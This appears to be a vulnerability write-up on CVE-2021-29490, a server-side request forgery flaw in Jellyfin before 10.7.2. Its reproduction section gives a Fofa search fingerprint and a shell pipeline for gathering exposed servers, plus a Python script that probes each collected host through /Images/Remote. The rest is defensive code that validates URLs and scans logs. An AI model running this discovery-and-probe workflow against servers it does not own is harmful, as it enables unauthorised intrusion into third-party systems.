xfeng
CVE-2021-29490-Jellyfin-SSRF

Vulnerability Introduction

Jellyfin is a free software media system that lets you manage and stream your media. It is an alternative to proprietary products such as Emby and Plex, and serves media to end-user devices from a dedicated server through several client applications. Jellyfin is the successor to Emby version 3.5.2, ported to the .NET Core framework to provide full cross-platform support. There are no strings attached: just a team that wants to build something better and works together to make the best media system accessible to all users.

There is an SSRF vulnerability in Jellyfin's RemoteImageController.cs: the server fetches a URL supplied by the client, so a specially constructed request can be used to probe internal network information.

Affected Versions

Jellyfin < 10.7.2

Vulnerability Reproduction

The Fofa search-engine fingerprint is "Jellyfin" && port="8096"; use Fofa 采集工具.exe (a Fofa asset collection tool) to collect assets in batches.

The collected asset results will be saved to a result.csv file in the same directory.

Extract the IPs or domain names with a shell command:

cat result.csv | awk -F "," '{print $2}' | httpx >> Jellyfin.txt

Then use a Python script to validate them in batches.

import requests
from requests.packages.urllib3.exceptions import InsecureRequestWarning

# Requests are sent with verify=False; silence the warning urllib3 would print for each one.
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)

def Jellyfin():
    with open("Jellyfin.txt") as file:
        for line in file:
            host = line.strip()  # drop the trailing newline, otherwise the URL is broken
            if not host:
                continue
            vuln_url = host + "/Images/Remote?imageUrl=http://www.baidu.com"

            try:
                response = requests.get(url=vuln_url, verify=False, timeout=10)
                if response.status_code == 200:
                    print(vuln_url)
            except Exception:
                # unreachable host or timeout: skip it
                continue

def main():
    Jellyfin()

if __name__ == '__main__':
    main()

Vulnerability Fix

Upgrade to a version that is not affected (Jellyfin 10.7.2 or later).

For information about SSRF vulnerabilities, you can refer to this article:

Web Security: SSRF Vulnerabilities
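Upgrading closes the hole, but the fix underneath is a check on the client-supplied URL before the server fetches anything, and the same check can be run over past web-server logs to see whether the endpoint was hit with internal targets before the upgrade. The Python below is an added example written for this post, not Jellyfin's own code; it assumes nothing about Jellyfin beyond the /Images/Remote?imageUrl= endpoint named above, and the log lines, hostnames (img.example, rebind.example) and address 11.22.33.44 are constructed.

```python
import ipaddress
import socket
from urllib.parse import parse_qs, urlsplit

# Only plain web URLs are acceptable for a remote image fetch.
ALLOWED_SCHEMES = {"http", "https"}


def _default_resolver(host):
    """Return every address a hostname resolves to (A and AAAA records)."""
    return {info[4][0] for info in socket.getaddrinfo(host, None)}


def static_resolver(table):
    """Build an offline resolver from a {hostname: {addresses}} table (for tests/demos)."""
    def resolve(host):
        if host not in table:
            raise ValueError(f"unknown host: {host}")
        return table[host]
    return resolve


def _is_ip_literal(host):
    try:
        ipaddress.ip_address(host)
        return True
    except ValueError:
        return False


def is_forbidden_ip(ip_text):
    """True for loopback, private, link-local, multicast and other non-public addresses."""
    ip = ipaddress.ip_address(ip_text)
    # ::ffff:127.0.0.1 is loopback in disguise; judge the embedded IPv4 address instead.
    if ip.version == 6 and ip.ipv4_mapped is not None:
        ip = ip.ipv4_mapped
    return (not ip.is_global) or ip.is_multicast


def is_safe_remote_url(url, resolver=_default_resolver):
    """Accept url only if it is http(s), carries no userinfo, and every address
    its host resolves to is public. The resolver is injectable so the check can
    be exercised offline."""
    try:
        parts = urlsplit(url)
    except ValueError:
        return False
    if parts.scheme.lower() not in ALLOWED_SCHEMES or not parts.hostname:
        return False
    if parts.username is not None or parts.password is not None:
        return False  # "http://img.example@10.0.0.1/" style confusion
    host = parts.hostname
    try:
        addresses = {host} if _is_ip_literal(host) else resolver(host)
    except (ValueError, OSError):  # socket.gaierror is an OSError
        return False  # unresolvable names are rejected, not retried
    if not addresses:
        return False
    return not any(is_forbidden_ip(a) for a in addresses)


# Constructed access-log lines in common log format (not real traffic).
SAMPLE_LOG = [
    '10.0.0.5 - - [13/Aug/2022:18:05:00 +0800] "GET /Images/Remote?imageUrl=http%3A%2F%2F127.0.0.1%3A8096%2F HTTP/1.1" 200 512',
    '10.0.0.5 - - [13/Aug/2022:18:05:01 +0800] "GET /Images/Remote?imageUrl=http%3A%2F%2F10.0.0.1%3A8080%2F HTTP/1.1" 200 1024',
    '10.0.0.7 - - [13/Aug/2022:18:05:02 +0800] "GET /Images/Remote?imageUrl=https%3A%2F%2Fimg.example%2Fposter.jpg HTTP/1.1" 200 40211',
    '10.0.0.7 - - [13/Aug/2022:18:05:03 +0800] "GET /System/Info/Public HTTP/1.1" 200 300',
]


def find_suspicious_image_requests(log_lines, resolver=_default_resolver):
    """Apply the same check to past /Images/Remote requests in an access log and
    return the imageUrl values that would have been refused."""
    hits = []
    for line in log_lines:
        try:
            request_line = line.split('"')[1]  # 'GET /path?query HTTP/1.1'
            target = request_line.split()[1]
        except IndexError:
            continue
        parts = urlsplit(target)
        if not parts.path.lower().endswith("/images/remote"):  # works under a base path too
            continue
        for image_url in parse_qs(parts.query).get("imageUrl", []):
            if not is_safe_remote_url(image_url, resolver):
                hits.append(image_url)
    return hits


if __name__ == "__main__":
    offline = static_resolver({"img.example": {"11.22.33.44"}})
    for flagged in find_suspicious_image_requests(SAMPLE_LOG, offline):
        print("would have been refused:", flagged)
```

One caveat on the design: resolving the host in the check and then letting the HTTP client resolve it again is a time-of-check/time-of-use gap (DNS rebinding), so the fetch should connect to the address that passed the check, and any redirect target must go through the same check before it is followed.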
